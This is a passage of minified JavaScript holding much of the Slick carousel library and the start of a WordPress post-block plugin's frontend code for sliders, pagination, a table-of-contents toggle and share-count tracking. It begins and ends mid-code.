t,e=this,i=0,s=0,o=[];for(!1===e.options.infinite?t=e.slideCount:(i=-1*e.options.slidesToScroll,s=-1*e.options.slidesToScroll,t=2*e.slideCount);i<t;)o.push(i),i=s+e.options.slidesToScroll,s+=e.options.slidesToScroll<=e.options.slidesToShow?e.options.slidesToScroll:e.options.slidesToShow;return o},i.prototype.getSlick=function(){return this},i.prototype.getSlideCount=function(){var e,i,s,o=this;return s=!0===o.options.centerMode?Math.floor(o.$list.width()/2):0,i=-1*o.swipeLeft+s,!0===o.options.swipeToSlide?(o.$slideTrack.find(".slick-slide").each((function(s,l){var n,a;if(n=t(l).outerWidth(),a=l.offsetLeft,!0!==o.options.centerMode&&(a+=n/2),i<a+n)return e=l,!1})),Math.abs(t(e).attr("data-slick-index")-o.currentSlide)||1):o.options.slidesToScroll},i.prototype.goTo=i.prototype.slickGoTo=function(t,e){this.changeSlide({data:{message:"index",index:parseInt(t)}},e)},i.prototype.init=function(e){var i=this;t(i.$slider).hasClass("slick-initialized")||(t(i.$slider).addClass("slick-initialized"),i.buildRows(),i.buildOut(),i.setProps(),i.startLoad(),i.loadSlider(),i.initializeEvents(),i.updateArrows(),i.updateDots(),i.checkResponsive(!0),i.focusHandler()),e&&i.$slider.trigger("init",[i]),!0===i.options.accessibility&&i.initADA(),i.options.autoplay&&(i.paused=!1,i.autoPlay())},i.prototype.initADA=function(){var e=this,i=Math.ceil(e.slideCount/e.options.slidesToShow),s=e.getNavigableIndexes().filter((function(t){return t>=0&&t<e.slideCount}));e.$slides.add(e.$slideTrack.find(".slick-cloned")).attr({"aria-hidden":"true",tabindex:"-1"}).find("a, input, button, select").attr({tabindex:"-1"}),null!==e.$dots&&(e.$slides.not(e.$slideTrack.find(".slick-cloned")).each((function(i){var o=s.indexOf(i);if(t(this).attr({role:"tabpanel",id:"slick-slide"+e.instanceUid+i,tabindex:-1}),-1!==o){var l="slick-slide-control"+e.instanceUid+o;t("#"+l).length&&t(this).attr({"aria-describedby":l})}})),e.$dots.attr("role","tablist").find("li").each((function(o){var l=s[o];t(this).attr({role:"presentation"}),t(this).find("button").first().attr({role:"tab",id:"slick-slide-control"+e.instanceUid+o,"aria-controls":"slick-slide"+e.instanceUid+l,"aria-label":o+1+" of "+i,"aria-selected":null,tabindex:"-1"})})).eq(e.currentSlide).find("button").attr({"aria-selected":"true",tabindex:"0"}).end());for(var o=e.currentSlide,l=o+e.options.slidesToShow;o<l;o++)e.options.focusOnChange?e.$slides.eq(o).attr({tabindex:"0"}):e.$slides.eq(o).removeAttr("tabindex");e.activateADA()},i.prototype.initArrowEvents=function(){var t=this;!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow.off("click.slick").on("click.slick",{message:"previous"},t.changeSlide),t.$nextArrow.off("click.slick").on("click.slick",{message:"next"},t.changeSlide),!0===t.options.accessibility&&(t.$prevArrow.on("keydown.slick",t.keyHandler),t.$nextArrow.on("keydown.slick",t.keyHandler)))},i.prototype.initDotEvents=function(){var e=this;!0===e.options.dots&&e.slideCount>e.options.slidesToShow&&(t("li",e.$dots).on("click.slick",{message:"index"},e.changeSlide),!0===e.options.accessibility&&e.$dots.on("keydown.slick",e.keyHandler)),!0===e.options.dots&&!0===e.options.pauseOnDotsHover&&e.slideCount>e.options.slidesToShow&&t("li",e.$dots).on("mouseenter.slick",t.proxy(e.interrupt,e,!0)).on("mouseleave.slick",t.proxy(e.interrupt,e,!1))},i.prototype.initSlideEvents=function(){var e=this;e.options.pauseOnHover&&(e.$list.on("mouseenter.slick",t.proxy(e.interrupt,e,!0)),e.$list.on("mouseleave.slick",t.proxy(e.interrupt,e,!1)))},i.prototype.initializeEvents=function(){var e=this;e.initArrowEvents(),e.initDotEvents(),e.initSlideEvents(),e.$list.on("touchstart.slick mousedown.slick",{action:"start"},e.swipeHandler),e.$list.on("touchmove.slick mousemove.slick",{action:"move"},e.swipeHandler),e.$list.on("touchend.slick mouseup.slick",{action:"end"},e.swipeHandler),e.$list.on("touchcancel.slick mouseleave.slick",{action:"end"},e.swipeHandler),e.$list.on("click.slick",e.clickHandler),t(document).on(e.visibilityChange,t.proxy(e.visibility,e)),!0===e.options.accessibility&&e.$list.on("keydown.slick",e.keyHandler),!0===e.options.focusOnSelect&&t(e.$slideTrack).children().on("click.slick",e.selectHandler),t(window).on("orientationchange.slick.slick-"+e.instanceUid,t.proxy(e.orientationChange,e)),t(window).on("resize.slick.slick-"+e.instanceUid,t.proxy(e.resize,e)),t("[draggable!=true]",e.$slideTrack).on("dragstart",e.preventDefault),t(window).on("load.slick.slick-"+e.instanceUid,e.setPosition),t(e.setPosition)},i.prototype.initUI=function(){var t=this;!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow.show(),t.$nextArrow.show()),!0===t.options.dots&&t.slideCount>t.options.slidesToShow&&t.$dots.show()},i.prototype.keyHandler=function(t){var e=this;t.target.tagName.match("TEXTAREA|INPUT|SELECT")||(37===t.keyCode&&!0===e.options.accessibility?e.changeSlide({data:{message:!0===e.options.rtl?"next":"previous"}}):39===t.keyCode&&!0===e.options.accessibility&&e.changeSlide({data:{message:!0===e.options.rtl?"previous":"next"}}))},i.prototype.lazyLoad=function(){var e,i,s,o=this;function l(e){t("img[data-lazy]",e).each((function(){var e=t(this),i=t(this).attr("data-lazy"),s=t(this).attr("data-srcset"),l=t(this).attr("data-sizes")||o.$slider.attr("data-sizes"),n=document.createElement("img");n.onload=function(){e.animate({opacity:0},100,(function(){s&&(e.attr("srcset",s),l&&e.attr("sizes",l)),e.attr("src",i).animate({opacity:1},200,(function(){e.removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading")})),o.$slider.trigger("lazyLoaded",[o,e,i])}))},n.onerror=function(){e.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),o.$slider.trigger("lazyLoadError",[o,e,i])},n.src=i}))}if(!0===o.options.centerMode?!0===o.options.infinite?s=(i=o.currentSlide+(o.options.slidesToShow/2+1))+o.options.slidesToShow+2:(i=Math.max(0,o.currentSlide-(o.options.slidesToShow/2+1)),s=o.options.slidesToShow/2+1+2+o.currentSlide):(i=o.options.infinite?o.options.slidesToShow+o.currentSlide:o.currentSlide,s=Math.ceil(i+o.options.slidesToShow),!0===o.options.fade&&(i>0&&i--,s<=o.slideCount&&s++)),e=o.$slider.find(".slick-slide").slice(i,s),"anticipated"===o.options.lazyLoad)for(var n=i-1,a=s,r=o.$slider.find(".slick-slide"),d=0;d<o.options.slidesToScroll;d++)n<0&&(n=o.slideCount-1),e=(e=e.add(r.eq(n))).add(r.eq(a)),n--,a++;l(e),o.slideCount<=o.options.slidesToShow?l(o.$slider.find(".slick-slide")):o.currentSlide>=o.slideCount-o.options.slidesToShow?l(o.$slider.find(".slick-cloned").slice(0,o.options.slidesToShow)):0===o.currentSlide&&l(o.$slider.find(".slick-cloned").slice(-1*o.options.slidesToShow))},i.prototype.loadSlider=function(){var t=this;t.setPosition(),t.$slideTrack.css({opacity:1}),t.$slider.removeClass("slick-loading"),t.initUI(),"progressive"===t.options.lazyLoad&&t.progressiveLazyLoad()},i.prototype.next=i.prototype.slickNext=function(){this.changeSlide({data:{message:"next"}})},i.prototype.orientationChange=function(){this.checkResponsive(),this.setPosition()},i.prototype.pause=i.prototype.slickPause=function(){this.autoPlayClear(),this.paused=!0},i.prototype.play=i.prototype.slickPlay=function(){var t=this;t.autoPlay(),t.options.autoplay=!0,t.paused=!1,t.focussed=!1,t.interrupted=!1},i.prototype.postSlide=function(e){var i=this;i.unslicked||(i.$slider.trigger("afterChange",[i,e]),i.animating=!1,i.slideCount>i.options.slidesToShow&&i.setPosition(),i.swipeLeft=null,i.options.autoplay&&i.autoPlay(),!0===i.options.accessibility&&(i.initADA(),i.options.focusOnChange&&t(i.$slides.get(i.currentSlide)).attr("tabindex",0).focus()))},i.prototype.prev=i.prototype.slickPrev=function(){this.changeSlide({data:{message:"previous"}})},i.prototype.preventDefault=function(t){t.preventDefault()},i.prototype.progressiveLazyLoad=function(e){e=e||1;var i,s,o,l,n,a=this,r=t("img[data-lazy]",a.$slider);r.length?(i=r.first(),s=i.attr("data-lazy"),o=i.attr("data-srcset"),l=i.attr("data-sizes")||a.$slider.attr("data-sizes"),(n=document.createElement("img")).onload=function(){o&&(i.attr("srcset",o),l&&i.attr("sizes",l)),i.attr("src",s).removeAttr("data-lazy data-srcset data-sizes").removeClass("slick-loading"),!0===a.options.adaptiveHeight&&a.setPosition(),a.$slider.trigger("lazyLoaded",[a,i,s]),a.progressiveLazyLoad()},n.onerror=function(){e<3?setTimeout((function(){a.progressiveLazyLoad(e+1)}),500):(i.removeAttr("data-lazy").removeClass("slick-loading").addClass("slick-lazyload-error"),a.$slider.trigger("lazyLoadError",[a,i,s]),a.progressiveLazyLoad())},n.src=s):a.$slider.trigger("allImagesLoaded",[a])},i.prototype.refresh=function(e){var i,s,o=this;s=o.slideCount-o.options.slidesToShow,!o.options.infinite&&o.currentSlide>s&&(o.currentSlide=s),o.slideCount<=o.options.slidesToShow&&(o.currentSlide=0),i=o.currentSlide,o.destroy(!0),t.extend(o,o.initials,{currentSlide:i}),o.init(),e||o.changeSlide({data:{message:"index",index:i}},!1)},i.prototype.registerBreakpoints=function(){var e,i,s,o=this,l=o.options.responsive||null;if("array"===t.type(l)&&l.length){for(e in o.respondTo=o.options.respondTo||"window",l)if(s=o.breakpoints.length-1,l.hasOwnProperty(e)){for(i=l[e].breakpoint;s>=0;)o.breakpoints[s]&&o.breakpoints[s]===i&&o.breakpoints.splice(s,1),s--;o.breakpoints.push(i),o.breakpointSettings[i]=l[e].settings}o.breakpoints.sort((function(t,e){return o.options.mobileFirst?t-e:e-t}))}},i.prototype.reinit=function(){var e=this;e.$slides=e.$slideTrack.children(e.options.slide).addClass("slick-slide"),e.slideCount=e.$slides.length,e.currentSlide>=e.slideCount&&0!==e.currentSlide&&(e.currentSlide=e.currentSlide-e.options.slidesToScroll),e.slideCount<=e.options.slidesToShow&&(e.currentSlide=0),e.registerBreakpoints(),e.setProps(),e.setupInfinite(),e.buildArrows(),e.updateArrows(),e.initArrowEvents(),e.buildDots(),e.updateDots(),e.initDotEvents(),e.cleanUpSlideEvents(),e.initSlideEvents(),e.checkResponsive(!1,!0),!0===e.options.focusOnSelect&&t(e.$slideTrack).children().on("click.slick",e.selectHandler),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),e.setPosition(),e.focusHandler(),e.paused=!e.options.autoplay,e.autoPlay(),e.$slider.trigger("reInit",[e])},i.prototype.resize=function(){var e=this;t(window).width()!==e.windowWidth&&(clearTimeout(e.windowDelay),e.windowDelay=window.setTimeout((function(){e.windowWidth=t(window).width(),e.checkResponsive(),e.unslicked||e.setPosition()}),50))},i.prototype.removeSlide=i.prototype.slickRemove=function(t,e,i){var s=this;if(t="boolean"==typeof t?!0===(e=t)?0:s.slideCount-1:!0===e?--t:t,s.slideCount<1||t<0||t>s.slideCount-1)return!1;s.unload(),!0===i?s.$slideTrack.children().remove():s.$slideTrack.children(this.options.slide).eq(t).remove(),s.$slides=s.$slideTrack.children(this.options.slide),s.$slideTrack.children(this.options.slide).detach(),s.$slideTrack.append(s.$slides),s.$slidesCache=s.$slides,s.reinit()},i.prototype.setCSS=function(t){var e,i,s=this,o={};!0===s.options.rtl&&(t=-t),e="left"==s.positionProp?Math.ceil(t)+"px":"0px",i="top"==s.positionProp?Math.ceil(t)+"px":"0px",o[s.positionProp]=t,!1===s.transformsEnabled?s.$slideTrack.css(o):(o={},!1===s.cssTransitions?(o[s.animType]="translate("+e+", "+i+")",s.$slideTrack.css(o)):(o[s.animType]="translate3d("+e+", "+i+", 0px)",s.$slideTrack.css(o)))},i.prototype.setDimensions=function(){var t=this;!1===t.options.vertical?!0===t.options.centerMode&&t.$list.css({padding:"0px "+t.options.centerPadding}):(t.$list.height(t.$slides.first().outerHeight(!0)*t.options.slidesToShow),!0===t.options.centerMode&&t.$list.css({padding:t.options.centerPadding+" 0px"})),t.listWidth=t.$list.width(),t.listHeight=t.$list.height(),!1===t.options.vertical&&!1===t.options.variableWidth?(t.slideWidth=Math.ceil(t.listWidth/t.options.slidesToShow),t.$slideTrack.width(Math.ceil(t.slideWidth*t.$slideTrack.children(".slick-slide").length))):!0===t.options.variableWidth?t.$slideTrack.width(5e3*t.slideCount):(t.slideWidth=Math.ceil(t.listWidth),t.$slideTrack.height(Math.ceil(t.$slides.first().outerHeight(!0)*t.$slideTrack.children(".slick-slide").length)));var e=t.$slides.first().outerWidth(!0)-t.$slides.first().width();!1===t.options.variableWidth&&t.$slideTrack.children(".slick-slide").width(t.slideWidth-e)},i.prototype.setFade=function(){var e,i=this;i.$slides.each((function(s,o){e=i.slideWidth*s*-1,!0===i.options.rtl?t(o).css({position:"relative",right:e,top:0,zIndex:i.options.zIndex-2,opacity:0}):t(o).css({position:"relative",left:e,top:0,zIndex:i.options.zIndex-2,opacity:0})})),i.$slides.eq(i.currentSlide).css({zIndex:i.options.zIndex-1,opacity:1})},i.prototype.setHeight=function(){var t=this;if(1===t.options.slidesToShow&&!0===t.options.adaptiveHeight&&!1===t.options.vertical){var e=t.$slides.eq(t.currentSlide).outerHeight(!0);t.$list.css("height",e)}},i.prototype.setOption=i.prototype.slickSetOption=function(){var e,i,s,o,l,n=this,a=!1;if("object"===t.type(arguments[0])?(s=arguments[0],a=arguments[1],l="multiple"):"string"===t.type(arguments[0])&&(s=arguments[0],o=arguments[1],a=arguments[2],"responsive"===arguments[0]&&"array"===t.type(arguments[1])?l="responsive":void 0!==arguments[1]&&(l="single")),"single"===l)n.options[s]=o;else if("multiple"===l)t.each(s,(function(t,e){n.options[t]=e}));else if("responsive"===l)for(i in o)if("array"!==t.type(n.options.responsive))n.options.responsive=[o[i]];else{for(e=n.options.responsive.length-1;e>=0;)n.options.responsive[e].breakpoint===o[i].breakpoint&&n.options.responsive.splice(e,1),e--;n.options.responsive.push(o[i])}a&&(n.unload(),n.reinit())},i.prototype.setPosition=function(){var t=this;t.setDimensions(),t.setHeight(),!1===t.options.fade?t.setCSS(t.getLeft(t.currentSlide)):t.setFade(),t.$slider.trigger("setPosition",[t])},i.prototype.setProps=function(){var t=this,e=document.body.style;t.positionProp=!0===t.options.vertical?"top":"left","top"===t.positionProp?t.$slider.addClass("slick-vertical"):t.$slider.removeClass("slick-vertical"),void 0===e.WebkitTransition&&void 0===e.MozTransition&&void 0===e.msTransition||!0===t.options.useCSS&&(t.cssTransitions=!0),t.options.fade&&("number"==typeof t.options.zIndex?t.options.zIndex<3&&(t.options.zIndex=3):t.options.zIndex=t.defaults.zIndex),void 0!==e.OTransform&&(t.animType="OTransform",t.transformType="-o-transform",t.transitionType="OTransition",void 0===e.perspectiveProperty&&void 0===e.webkitPerspective&&(t.animType=!1)),void 0!==e.MozTransform&&(t.animType="MozTransform",t.transformType="-moz-transform",t.transitionType="MozTransition",void 0===e.perspectiveProperty&&void 0===e.MozPerspective&&(t.animType=!1)),void 0!==e.webkitTransform&&(t.animType="webkitTransform",t.transformType="-webkit-transform",t.transitionType="webkitTransition",void 0===e.perspectiveProperty&&void 0===e.webkitPerspective&&(t.animType=!1)),void 0!==e.msTransform&&(t.animType="msTransform",t.transformType="-ms-transform",t.transitionType="msTransition",void 0===e.msTransform&&(t.animType=!1)),void 0!==e.transform&&!1!==t.animType&&(t.animType="transform",t.transformType="transform",t.transitionType="transition"),t.transformsEnabled=t.options.useTransform&&null!==t.animType&&!1!==t.animType},i.prototype.setSlideClasses=function(t){var e,i,s,o,l=this;if(i=l.$slider.find(".slick-slide").removeClass("slick-active slick-center slick-current").attr("aria-hidden","true"),l.$slides.eq(t).addClass("slick-current"),!0===l.options.centerMode){var n=l.options.slidesToShow%2==0?1:0;e=Math.floor(l.options.slidesToShow/2),!0===l.options.infinite&&(t>=e&&t<=l.slideCount-1-e?l.$slides.slice(t-e+n,t+e+1).addClass("slick-active").attr("aria-hidden","false"):(s=l.options.slidesToShow+t,i.slice(s-e+1+n,s+e+2).addClass("slick-active").attr("aria-hidden","false")),0===t?i.eq(l.options.slidesToShow+l.slideCount+1).addClass("slick-center"):t===l.slideCount-1&&i.eq(l.options.slidesToShow).addClass("slick-center")),l.$slides.eq(t).addClass("slick-center")}else t>=0&&t<=l.slideCount-l.options.slidesToShow?l.$slides.slice(t,t+l.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"):i.length<=l.options.slidesToShow?i.addClass("slick-active").attr("aria-hidden","false"):(o=l.slideCount%l.options.slidesToShow,s=!0===l.options.infinite?l.options.slidesToShow+t:t,l.options.slidesToShow==l.options.slidesToScroll&&l.slideCount-t<l.options.slidesToShow?i.slice(s-(l.options.slidesToShow-o),s+o).addClass("slick-active").attr("aria-hidden","false"):i.slice(s,s+l.options.slidesToShow).addClass("slick-active").attr("aria-hidden","false"));"ondemand"!==l.options.lazyLoad&&"anticipated"!==l.options.lazyLoad||l.lazyLoad()},i.prototype.setupInfinite=function(){var e,i,s,o=this;if(!0===o.options.fade&&(o.options.centerMode=!1),!0===o.options.infinite&&!1===o.options.fade&&(i=null,o.slideCount>o.options.slidesToShow)){for(s=!0===o.options.centerMode?o.options.slidesToShow+1:o.options.slidesToShow,e=o.slideCount;e>o.slideCount-s;e-=1)i=e-1,t(o.$slides[i]).clone(!0).attr("id","").attr("data-slick-index",i-o.slideCount).prependTo(o.$slideTrack).addClass("slick-cloned");for(e=0;e<s+o.slideCount;e+=1)i=e,t(o.$slides[i]).clone(!0).attr("id","").attr("data-slick-index",i+o.slideCount).appendTo(o.$slideTrack).addClass("slick-cloned");o.$slideTrack.find(".slick-cloned").find("[id]").each((function(){t(this).attr("id","")}))}},i.prototype.interrupt=function(t){t||this.autoPlay(),this.interrupted=t},i.prototype.selectHandler=function(e){var i=this,s=t(e.target).is(".slick-slide")?t(e.target):t(e.target).parents(".slick-slide"),o=parseInt(s.attr("data-slick-index"));o||(o=0),i.slideCount<=i.options.slidesToShow?i.slideHandler(o,!1,!0):i.slideHandler(o)},i.prototype.slideHandler=function(t,e,i){var s,o,l,n,a,r,d=this;if(e=e||!1,!(!0===d.animating&&!0===d.options.waitForAnimate||!0===d.options.fade&&d.currentSlide===t))if(!1===e&&d.asNavFor(t),s=t,a=d.getLeft(s),n=d.getLeft(d.currentSlide),d.currentLeft=null===d.swipeLeft?n:d.swipeLeft,!1===d.options.infinite&&!1===d.options.centerMode&&(t<0||t>d.getDotCount()*d.options.slidesToScroll))!1===d.options.fade&&(s=d.currentSlide,!0!==i&&d.slideCount>d.options.slidesToShow?d.animateSlide(n,(function(){d.postSlide(s)})):d.postSlide(s));else if(!1===d.options.infinite&&!0===d.options.centerMode&&(t<0||t>d.slideCount-d.options.slidesToScroll))!1===d.options.fade&&(s=d.currentSlide,!0!==i&&d.slideCount>d.options.slidesToShow?d.animateSlide(n,(function(){d.postSlide(s)})):d.postSlide(s));else{if(d.options.autoplay&&clearInterval(d.autoPlayTimer),o=s<0?d.slideCount%d.options.slidesToScroll!=0?d.slideCount-d.slideCount%d.options.slidesToScroll:d.slideCount+s:s>=d.slideCount?d.slideCount%d.options.slidesToScroll!=0?0:s-d.slideCount:s,d.animating=!0,d.$slider.trigger("beforeChange",[d,d.currentSlide,o]),l=d.currentSlide,d.currentSlide=o,d.setSlideClasses(d.currentSlide),d.options.asNavFor&&(r=(r=d.getNavTarget()).slick("getSlick")).slideCount<=r.options.slidesToShow&&r.setSlideClasses(d.currentSlide),d.updateDots(),d.updateArrows(),!0===d.options.fade)return!0!==i?(d.fadeSlideOut(l),d.fadeSlide(o,(function(){d.postSlide(o)}))):d.postSlide(o),void d.animateHeight();!0!==i&&d.slideCount>d.options.slidesToShow?d.animateSlide(a,(function(){d.postSlide(o)})):d.postSlide(o)}},i.prototype.startLoad=function(){var t=this;!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow.hide(),t.$nextArrow.hide()),!0===t.options.dots&&t.slideCount>t.options.slidesToShow&&t.$dots.hide(),t.$slider.addClass("slick-loading")},i.prototype.swipeDirection=function(){var t,e,i,s,o=this;return t=o.touchObject.startX-o.touchObject.curX,e=o.touchObject.startY-o.touchObject.curY,i=Math.atan2(e,t),(s=Math.round(180*i/Math.PI))<0&&(s=360-Math.abs(s)),s<=45&&s>=0||s<=360&&s>=315?!1===o.options.rtl?"left":"right":s>=135&&s<=225?!1===o.options.rtl?"right":"left":!0===o.options.verticalSwiping?s>=35&&s<=135?"down":"up":"vertical"},i.prototype.swipeEnd=function(t){var e,i,s=this;if(s.dragging=!1,s.swiping=!1,s.scrolling)return s.scrolling=!1,!1;if(s.interrupted=!1,s.shouldClick=!(s.touchObject.swipeLength>10),void 0===s.touchObject.curX)return!1;if(!0===s.touchObject.edgeHit&&s.$slider.trigger("edge",[s,s.swipeDirection()]),s.touchObject.swipeLength>=s.touchObject.minSwipe){switch(i=s.swipeDirection()){case"left":case"down":e=s.options.swipeToSlide?s.checkNavigable(s.currentSlide+s.getSlideCount()):s.currentSlide+s.getSlideCount(),s.currentDirection=0;break;case"right":case"up":e=s.options.swipeToSlide?s.checkNavigable(s.currentSlide-s.getSlideCount()):s.currentSlide-s.getSlideCount(),s.currentDirection=1}"vertical"!=i&&(s.slideHandler(e),s.touchObject={},s.$slider.trigger("swipe",[s,i]))}else s.touchObject.startX!==s.touchObject.curX&&(s.slideHandler(s.currentSlide),s.touchObject={})},i.prototype.swipeHandler=function(t){var e=this;if(!(!1===e.options.swipe||"ontouchend"in document&&!1===e.options.swipe||!1===e.options.draggable&&-1!==t.type.indexOf("mouse")))switch(e.touchObject.fingerCount=t.originalEvent&&void 0!==t.originalEvent.touches?t.originalEvent.touches.length:1,e.touchObject.minSwipe=e.listWidth/e.options.touchThreshold,!0===e.options.verticalSwiping&&(e.touchObject.minSwipe=e.listHeight/e.options.touchThreshold),t.data.action){case"start":e.swipeStart(t);break;case"move":e.swipeMove(t);break;case"end":e.swipeEnd(t)}},i.prototype.swipeMove=function(t){var e,i,s,o,l,n,a=this;return l=void 0!==t.originalEvent?t.originalEvent.touches:null,!(!a.dragging||a.scrolling||l&&1!==l.length)&&(e=a.getLeft(a.currentSlide),a.touchObject.curX=void 0!==l?l[0].pageX:t.clientX,a.touchObject.curY=void 0!==l?l[0].pageY:t.clientY,a.touchObject.swipeLength=Math.round(Math.sqrt(Math.pow(a.touchObject.curX-a.touchObject.startX,2))),n=Math.round(Math.sqrt(Math.pow(a.touchObject.curY-a.touchObject.startY,2))),!a.options.verticalSwiping&&!a.swiping&&n>4?(a.scrolling=!0,!1):(!0===a.options.verticalSwiping&&(a.touchObject.swipeLength=n),i=a.swipeDirection(),void 0!==t.originalEvent&&a.touchObject.swipeLength>4&&(a.swiping=!0,t.preventDefault()),o=(!1===a.options.rtl?1:-1)*(a.touchObject.curX>a.touchObject.startX?1:-1),!0===a.options.verticalSwiping&&(o=a.touchObject.curY>a.touchObject.startY?1:-1),s=a.touchObject.swipeLength,a.touchObject.edgeHit=!1,!1===a.options.infinite&&(0===a.currentSlide&&"right"===i||a.currentSlide>=a.getDotCount()&&"left"===i)&&(s=a.touchObject.swipeLength*a.options.edgeFriction,a.touchObject.edgeHit=!0),!1===a.options.vertical?a.swipeLeft=e+s*o:a.swipeLeft=e+s*(a.$list.height()/a.listWidth)*o,!0===a.options.verticalSwiping&&(a.swipeLeft=e+s*o),!0!==a.options.fade&&!1!==a.options.touchMove&&(!0===a.animating?(a.swipeLeft=null,!1):void a.setCSS(a.swipeLeft))))},i.prototype.swipeStart=function(t){var e,i=this;if(i.interrupted=!0,1!==i.touchObject.fingerCount||i.slideCount<=i.options.slidesToShow)return i.touchObject={},!1;void 0!==t.originalEvent&&void 0!==t.originalEvent.touches&&(e=t.originalEvent.touches[0]),i.touchObject.startX=i.touchObject.curX=void 0!==e?e.pageX:t.clientX,i.touchObject.startY=i.touchObject.curY=void 0!==e?e.pageY:t.clientY,i.dragging=!0},i.prototype.unfilterSlides=i.prototype.slickUnfilter=function(){var t=this;null!==t.$slidesCache&&(t.unload(),t.$slideTrack.children(this.options.slide).detach(),t.$slidesCache.appendTo(t.$slideTrack),t.reinit())},i.prototype.unload=function(){var e=this;t(".slick-cloned",e.$slider).remove(),e.$dots&&e.$dots.remove(),e.$prevArrow&&e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.remove(),e.$nextArrow&&e.htmlExpr.test(e.options.nextArrow)&&e.$nextArrow.remove(),e.$slides.removeClass("slick-slide slick-active slick-visible slick-current").attr("aria-hidden","true").css("width","")},i.prototype.unslick=function(t){var e=this;e.$slider.trigger("unslick",[e,t]),e.destroy()},i.prototype.updateArrows=function(){var t=this;Math.floor(t.options.slidesToShow/2),!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&!t.options.infinite&&(t.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false"),t.$nextArrow.removeClass("slick-disabled").attr("aria-disabled","false"),0===t.currentSlide?(t.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true"),t.$nextArrow.removeClass("slick-disabled").attr("aria-disabled","false")):(t.currentSlide>=t.slideCount-t.options.slidesToShow&&!1===t.options.centerMode||t.currentSlide>=t.slideCount-1&&!0===t.options.centerMode)&&(t.$nextArrow.addClass("slick-disabled").attr("aria-disabled","true"),t.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false")))},i.prototype.updateDots=function(){var t=this;null!==t.$dots&&(t.$dots.find("li").removeClass("slick-active").end(),t.$dots.find("li").eq(Math.floor(t.currentSlide/t.options.slidesToScroll)).addClass("slick-active"))},i.prototype.visibility=function(){var t=this;t.options.autoplay&&(document[t.hidden]?t.interrupted=!0:t.interrupted=!1)},t.fn.slick=function(){var t,e,s=this,o=arguments[0],l=Array.prototype.slice.call(arguments,1),n=s.length;for(t=0;t<n;t++)if("object"==typeof o||void 0===o?s[t].slick=new i(s[t],o):e=s[t].slick[o].apply(s[t].slick,l),void 0!==e)return e;return s}})),function(t){"use strict";const e=0==t("body.postx-admin-page").length;function i(){t(document).scrollTop()>1e3?(t(".ultp-toc-backtotop").addClass("tocshow"),t(".wp-block-ultimate-post-table-of-content").addClass("ultp-toc-scroll")):(t(".ultp-toc-backtotop").removeClass("tocshow"),t(".wp-block-ultimate-post-table-of-content").removeClass("ultp-toc-scroll"))}function s(t,e,i){e==i?t.find(".ultp-next-page-numbers").hide():t.find(".ultp-next-page-numbers").show(),e>1?t.find(".ultp-prev-page-numbers").show():t.find(".ultp-prev-page-numbers").hide(),e>3?t.find(".ultp-first-dot").show():t.find(".ultp-first-dot").hide(),e>2?t.find(".ultp-first-pages").show():t.find(".ultp-first-pages").hide(),i>e+2?t.find(".ultp-last-dot").show():t.find(".ultp-last-dot").hide(),i>e+1?t.find(".ultp-last-pages").show():t.find(".ultp-last-pages").hide()}function o(e,i,s){let o=i<=2?[1,2,3]:s==i?[s-2,s-1,s]:[i-1,i,i+1],l=0;e.find(".ultp-center-item").each((function(){i==o[l]&&t(this).addClass("pagination-active"),t(this).find("a").blur(),t(this).attr("data-current",o[l]).find("a").text(o[l]),l++})),e.find(".ultp-prev-page-numbers a").blur(),e.find(".ultp-next-page-numbers a").blur()}function l(t,e){null!=e&&sessionStorage.setItem(t,e)}function n(){t(".wp-block-ultimate-post-post-slider-1, .wp-block-ultimate-post-post-slider-2").each((function(){const e="#"+t(this).attr("id");let i=t(e).find(".ultp-block-items-wrap");t(this).parent(".ultp-shortcode")&&(i=t(this).find(".ultp-block-items-wrap"));let s={arrows:!0,dots:!!i.data("dots"),infinite:!0,speed:500,slidesToShow:i.data("slidelg")||1,slidesToScroll:1,autoplay:!!i.data("autoplay"),autoplaySpeed:i.data("slidespeed")||3e3,cssEase:"linear",prevArrow:i.parent().find(".ultp-slick-prev").html(),nextArrow:i.parent().find(".ultp-slick-next").html()},o="slide2"==i.data("layout")||"slide3"==i.data("layout")||"slide5"==i.data("layout")||"slide6"==i.data("layout")||"slide8"==i.data("layout");i.data("layout")?i.data("fade")&&o?s.fade=!!i.data("fade"):!i.data("fade")&&o?(s.slidesToShow=i.data("slidelg")||1,s.responsive=[{breakpoint:991,settings:{slidesToShow:i.data("slidesm")||1,slidesToScroll:1}},{breakpoint:767,settings:{slidesToShow:i.data("slidexs")||1,slidesToScroll:1}}]):(s.slidesToShow=i.data("slidelg")||1,s.centerMode=!0,s.centerPadding=`${i.data("paddlg")}px`||100,s.responsive=[{breakpoint:991,settings:{slidesToShow:i.data("slidesm")||1,slidesToScroll:1,centerPadding:`${i.data("paddsm")}px`||50}},{breakpoint:767,settings:{slidesToShow:i.data("slidexs")||1,slidesToScroll:1,centerPadding:`${i.data("paddxs")}px`||50}}]):i.data("slidelg")<2?s.fade=!!i.data("fade"):s.responsive=[{breakpoint:1024,settings:{slidesToShow:i.data("slidesm")||1,slidesToScroll:1}},{breakpoint:600,settings:{slidesToShow:i.data("slidexs")||1,slidesToScroll:1}}],i.not(".slick-initialized").slick(s)}))}t(".ultp-post-share-item a").each((function(){t(this).on("click",(function(){let e,i,s=t(this).attr("url");e=window.screen.width/2-410,i=window.screen.height/2-300;let o="height=500,width=800,resizable=yes,left="+e+",top="+i+",screenX="+e+",screenY="+i;window.open(s,"sharer",o);let l=t(this).parents(".ultp-post-share-item-inner-block").attr("postId"),n=t(this).parents(".ultp-post-share-item-inner-block").attr("count");return t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_share_count",shareCount:n,postId:l,wpnonce:ultp_data_frontend.security},error:function(t){console.log("Error occured.please try 